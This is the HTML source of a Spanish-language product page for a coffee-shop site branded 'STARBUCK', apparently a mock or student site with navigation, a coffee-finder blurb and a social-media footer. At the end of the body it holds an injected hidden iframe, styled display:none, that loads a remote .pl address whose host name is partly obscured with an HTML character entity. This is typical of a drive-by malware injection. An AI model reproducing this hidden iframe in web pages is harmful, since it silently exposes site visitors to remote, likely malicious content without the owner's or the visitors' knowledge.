<!DOCTYPE HTML>
<html>
	<head>
		<title>Productos</title>
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1" />
		<link rel="stylesheet" href="assets/css/elementos.css"/>
		<link rel="stylesheet" href="assets/css/cafe.css" />
	</head>
	<body>
		<div id="page-wrapper">

			<!-- Header -->
				<header id="header">
					<h1 id="logo"><a href="index.html">STARBUCK</a></h1>
					<nav id="nav">
						<ul>
							<li><a href="pagina mejora/index.html">CAFÉ</a></li>
							<li><a href="#">PRODUCTOS</a></li>
							<li><a href="tienda/inicio.html">TIENDAS</a></li>
							<li><a href="#">RESP. SOCIAL</a></li>
							<li><a href="login/login.html" class="button special">Iniciar Sesión</a></li>
						</ul>
					</nav>
				</header>

			<!-- Main -->
				<div id="main" class="wrapper style1">
					<div class="container">
						<header class="major">
							<h2>Productos</h2>
							<h2>¡La mejor parte del día es verte!</h2>
							<p>Disfrutemos juntos nuevos momentos con nuevos sabores.¡Conoce nuestros productos de temporada!</p>
						</header>
								
								</section>
								</div>
								</div>
								</div>
								<div class="mayor">
								<h4>BUSCADOR DE CAFÉ</h4>
								<p><span class="image left"><img src="images/receta2.png" alt="" /></span>Nuestros maestros cafeteros han destilado años de conocimientos sobre sabores en tres sencillas preguntas para ayudarle a encontrar ese café que de seguro le encantará.</p>
								<p><span class="image right"><img src="images/receta.png"/></span></p>
							</section>

					</div>
				</div>

			<!-- Footer -->
				<footer id="footer">
					<ul class="icons">
						<li><a href="#" class="icon alt fa-twitter"><span class="label">Twitter</span></a></li>
						<li><a href="#" class="icon alt fa-facebook"><span class="label">Facebook</span></a></li>
						<li><a href="#" class="icon alt fa-linkedin"><span class="label">LinkedIn</span></a></li>
						<li><a href="#" class="icon alt fa-instagram"><span class="label">Instagram</span></a></li>
						<li><a href="#" class="icon alt fa-github"><span class="label">GitHub</span></a></li>
						<li><a href="#" class="icon alt fa-envelope"><span class="label">Email</span></a></li>
					</ul>
					<ul class="copyright">
						<li>&copy; 2017. All rights reserved.</li><li>Design: <a href="http://www.starbucks.com.mx/">Starbuck</a></li>
					</ul>
				</footer>

		</div>
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>
</html>